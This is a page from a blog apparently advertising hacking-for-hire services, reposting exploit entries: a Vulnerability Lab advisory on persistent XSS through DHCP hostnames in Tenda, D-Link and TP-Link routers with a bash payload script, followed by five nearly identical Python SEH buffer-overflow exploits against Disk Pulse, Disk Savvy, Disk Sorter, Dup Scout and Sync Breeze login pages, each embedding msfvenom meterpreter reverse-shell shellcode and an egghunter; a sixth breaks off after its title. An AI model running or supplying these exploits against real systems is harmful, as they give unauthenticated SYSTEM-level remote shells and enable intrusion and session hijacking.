Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863587820

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
Document Title:
===============
Tenda, Dlink & Tplink TD-W8961ND - DHCP XSS Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=1990


Release Date:
=============
2016-11-28


Vulnerability Laboratory ID (VL-ID):
====================================
1990


Common Vulnerability Scoring System:
====================================
3.5


Abstract Advisory Information:
==============================
The vulnerability laboratory research team discovered a persistent xss vulnerability in the Tenda, Dlink & Tplink 1.0.1 TD-W8961ND & ADSL2+ Modem Routers web-application.


Vulnerability Disclosure Timeline:
==================================
2016-11-28:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
Persistent cross site scripting vulnerability has been discovered in Tenda 1.0.1 ADSL Modem Routers.
The vulnerability allows remote attackers and local privileged account to inject malicious script codes 
on the application-side to manipulate the router dhcp hostnames. 

Attackers are able to inject malicious code into the current list of DHCP clients on view, by modifying 
the DHCP hostname into valid xss payload. The execution of vulnerability occurs on the application-side 
on view events. Due to our investigation, we discovered that all models with the firmware v1.x on the 
web gui are affected by the security vulnerability. Remote attackers can for example make special crafted 
malicious pages with POST method requests to manipulate the dhcp hostname listing and client view.

The security risk of the issue is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. 
Exploitation of the vulnerability requires no privilege web-application user account and only low user interaction. 
Successful exploitation of the vulnerability results in phishing attacks, session hijacking, persistent external redirect 
to malicious sources and persistent manipulation of affected or connected web module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] DHCP Client List 
[+] DHCP settings

Vulnerable Parameter(s):
[+] Hostnames


Proof of Concept (PoC):
=======================
Persistent vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


Manaul steps to reproduce the vulnerability ... (local)
1. Open the Router UI
2. Login as basic account
3. Open the DHCP List module via settings
4. Inject a payload to the hostnames input field
5. Save the input
6. Now the list becomes visible with all clients and the payload executes within the context
7. Successful reproduce of the vulnerability!

The following code is a bash script working on supported Linux OS to change the name of DHCP hostnames to a xss payload. 
Save the file into vulnerablity.sh, then chmod +x vulnerability.sh.

PoC: Exploit
#!/bin/bash
GREEN=$(tput setaf 2 && tput bold)
BLUE=$(tput setaf 6 && tput bold) 
echo $BLUE"[+] Persistent XSS DHCP Exploiter via Routers"
echo $GREEN"[+] Vulnerability founded by : Lawrence Amer " 
echo -n $BLUE"[~] type XSS Payload here :"
read -e xss 
echo $xss > /etc/hostname
echo $GREEN"[+]DHCP HOST NAME IS WRITTEN"


Video: https://www.youtube.com/watch?v=HUM5myJWbvc


Solution - Fix & Patch:
=======================
The xss vulnerability can be patched by a secure parse of the hostnames client parameters.
Restrict the input and disallow the usage of special chars to prevent the injection point.
Parse as well the hostnames output location in the active dhcp clients list.


Security Risk:
==============
The security risk of the persistent xss web vulnerability in the router web-application is estimate as medium. (CVSS 3.5)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Lawrence Amer (https://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, 
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.

				    Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
HireHackking 
#!/usr/bin/python

print \"Disk Pulse Enterprise 9.1.16 Login Buffer Overflow\"
print \"Author: Tulpa / tulpa[at]tulpa-security[dot]com\"

#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security

#Exploit will land you NT AUTHORITY\\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust \'\\x41\' for bytes
#Tested on Windows 7 x86 Enterprise SP1

#Vendor has been notified on multiple occasions
#Exploit for version 9.0.34: www.exploit-db.com/exploits/40452/

#Shout-out to carbonated and ozzie_offsec

import socket
import sys

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((\'192.168.123.130\',80))


#bad chars \\x00\\x0a\\x0d\\x26


#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b \'\\x00\\x0a\\x0d\\x26\' -f python --smallest

#payload size 308



buf =  \"\"
buf += \"\\xdb\\xdc\\xb8\\x95\\x49\\x89\\x1d\\xd9\\x74\\x24\\xf4\\x5f\\x33\"
buf += \"\\xc9\\xb1\\x47\\x31\\x47\\x18\\x83\\xc7\\x04\\x03\\x47\\x81\\xab\"
buf += \"\\x7c\\xe1\\x41\\xa9\\x7f\\x1a\\x91\\xce\\xf6\\xff\\xa0\\xce\\x6d\"
buf += \"\\x8b\\x92\\xfe\\xe6\\xd9\\x1e\\x74\\xaa\\xc9\\x95\\xf8\\x63\\xfd\"
buf += \"\\x1e\\xb6\\x55\\x30\\x9f\\xeb\\xa6\\x53\\x23\\xf6\\xfa\\xb3\\x1a\"
buf += \"\\x39\\x0f\\xb5\\x5b\\x24\\xe2\\xe7\\x34\\x22\\x51\\x18\\x31\\x7e\"
buf += \"\\x6a\\x93\\x09\\x6e\\xea\\x40\\xd9\\x91\\xdb\\xd6\\x52\\xc8\\xfb\"
buf += \"\\xd9\\xb7\\x60\\xb2\\xc1\\xd4\\x4d\\x0c\\x79\\x2e\\x39\\x8f\\xab\"
buf += \"\\x7f\\xc2\\x3c\\x92\\xb0\\x31\\x3c\\xd2\\x76\\xaa\\x4b\\x2a\\x85\"
buf += \"\\x57\\x4c\\xe9\\xf4\\x83\\xd9\\xea\\x5e\\x47\\x79\\xd7\\x5f\\x84\"
buf += \"\\x1c\\x9c\\x53\\x61\\x6a\\xfa\\x77\\x74\\xbf\\x70\\x83\\xfd\\x3e\"
buf += \"\\x57\\x02\\x45\\x65\\x73\\x4f\\x1d\\x04\\x22\\x35\\xf0\\x39\\x34\"
buf += \"\\x96\\xad\\x9f\\x3e\\x3a\\xb9\\xad\\x1c\\x52\\x0e\\x9c\\x9e\\xa2\"
buf += \"\\x18\\x97\\xed\\x90\\x87\\x03\\x7a\\x98\\x40\\x8a\\x7d\\xdf\\x7a\"
buf += \"\\x6a\\x11\\x1e\\x85\\x8b\\x3b\\xe4\\xd1\\xdb\\x53\\xcd\\x59\\xb0\"
buf += \"\\xa3\\xf2\\x8f\\x2d\\xa1\\x64\\xf0\\x1a\\xd2\\xf2\\x98\\x58\\x25\"
buf += \"\\xeb\\x04\\xd4\\xc3\\x5b\\xe5\\xb6\\x5b\\x1b\\x55\\x77\\x0c\\xf3\"
buf += \"\\xbf\\x78\\x73\\xe3\\xbf\\x52\\x1c\\x89\\x2f\\x0b\\x74\\x25\\xc9\"
buf += \"\\x16\\x0e\\xd4\\x16\\x8d\\x6a\\xd6\\x9d\\x22\\x8a\\x98\\x55\\x4e\"
buf += \"\\x98\\x4c\\x96\\x05\\xc2\\xda\\xa9\\xb3\\x69\\xe2\\x3f\\x38\\x38\"
buf += \"\\xb5\\xd7\\x42\\x1d\\xf1\\x77\\xbc\\x48\\x8a\\xbe\\x28\\x33\\xe4\"
buf += \"\\xbe\\xbc\\xb3\\xf4\\xe8\\xd6\\xb3\\x9c\\x4c\\x83\\xe7\\xb9\\x92\"
buf += \"\\x1e\\x94\\x12\\x07\\xa1\\xcd\\xc7\\x80\\xc9\\xf3\\x3e\\xe6\\x55\"
buf += \"\\x0b\\x15\\xf6\\xaa\\xda\\x53\\x8c\\xc2\\xde\"


#pop pop ret 10015BFE

nseh = \"\\x90\\x90\\xEB\\x0B\"
seh = \"\\xFE\\x5B\\x01\\x10\"

egghunter = \"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\"
egghunter += \"\\xef\\xb8\\x77\\x30\\x30\\x74\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"

evil =  \"POST /login HTTP/1.1\\r\\n\"
evil += \"Host: 192.168.123.132\\r\\n\"
evil += \"User-Agent: Mozilla/5.0\\r\\n\"
evil += \"Connection: close\\r\\n\"
evil += \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"
evil += \"Accept-Language: en-us,en;q=0.5\\r\\n\"
evil += \"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n\"
evil += \"Keep-Alive: 300\\r\\n\"
evil += \"Proxy-Connection: keep-alive\\r\\n\"
evil += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"
evil += \"Content-Length: 17000\\r\\n\\r\\n\"
evil += \"username=admin\"
evil += \"&password=aaaaa\\r\\n\"
evil += \"\\x41\" * 13664 #subtract/add for payload
evil += \"B\" * 100
evil += \"w00tw00t\"
evil += buf
evil += \"\\x90\" * 212
evil += nseh
evil += seh
evil += \"\\x90\" * 10
evil += egghunter
evil += \"\\x90\" * 8672


print \'Sending evil buffer...\'
s.send(evil)
print \'Payload Sent!\'
s.close()
HireHackking 
#!/usr/bin/python

print "Disk Savvy Enterprise 9.1.14 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"

#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security

#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1

#Vendor has been notified on multiple occasions
#Exploit for version 9.0.32: www.exploit-db.com/exploits/40459/

#Shout-out to carbonated and ozzie_offsec

import socket
import sys

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))


#bad chars \x00\x0a\x0d\x26


#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest

#payload size 308



buf =  ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"


#pop pop ret 10081A9C

nseh = "\x90\x90\xEB\x0B"
seh = "\x9C\x1A\x08\x10"

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

evil =  "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "\x42" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672


print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
HireHackking 
#!/usr/bin/python

print "Disk Sorter Enterprise 9.1.12 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"

#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security

#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1

#Vendor has been notified on multiple occasions
#Exploit for version 9.0.24: www.exploit-db.com/exploits/40458/

#Shout-out to carbonated and ozzie_offsec

import socket
import sys

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))


#bad chars \x00\x0a\x0d\x26


#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest

#payload size 308



buf =  ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"


#pop pop ret 1004F9DD

nseh = "\x90\x90\xEB\x0B"
seh = "\xDD\xF9\x04\x10"

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

evil =  "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672


print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
HireHackking 
#!/usr/bin/python

print "Dup Scout Enterprise 9.1.14 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"

#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security

#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1

#Vendor has been notified on multiple occasions
#Exploit for version 9.0.28: www.exploit-db.com/exploits/40457/

#Shout-out to carbonated and ozzie_offsec

import socket
import sys

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))


#bad chars \x00\x0a\x0d\x26


#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest

#payload size 308



buf =  ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"


#pop pop ret 1004FAF3

nseh = "\x90\x90\xEB\x0B"
seh = "\xF3\xFA\x04\x10"

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

evil =  "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672


print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
HireHackking 
#!/usr/bin/python

print "Sync Breeze Enterprise 9.1.16 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"

#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security

#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1

#Vendor has been notified on multiple occasions
#Exploit for version 8.9.24: www.exploit-db.com/exploits/40456/

#Shout-out to carbonated and ozzie_offsec

import socket
import sys

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))


#bad chars \x00\x0a\x0d\x26


#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest

#payload size 308



buf =  ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"


#pop pop ret 1001A1B8

nseh = "\x90\x90\xEB\x0B"
seh = "\xB8\xA1\x01\x10"

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

evil =  "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672


print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
HireHackking 
#!/usr/bin/python

print "VX Search Enterprise 9.1.12 Login Buffer Overflow"
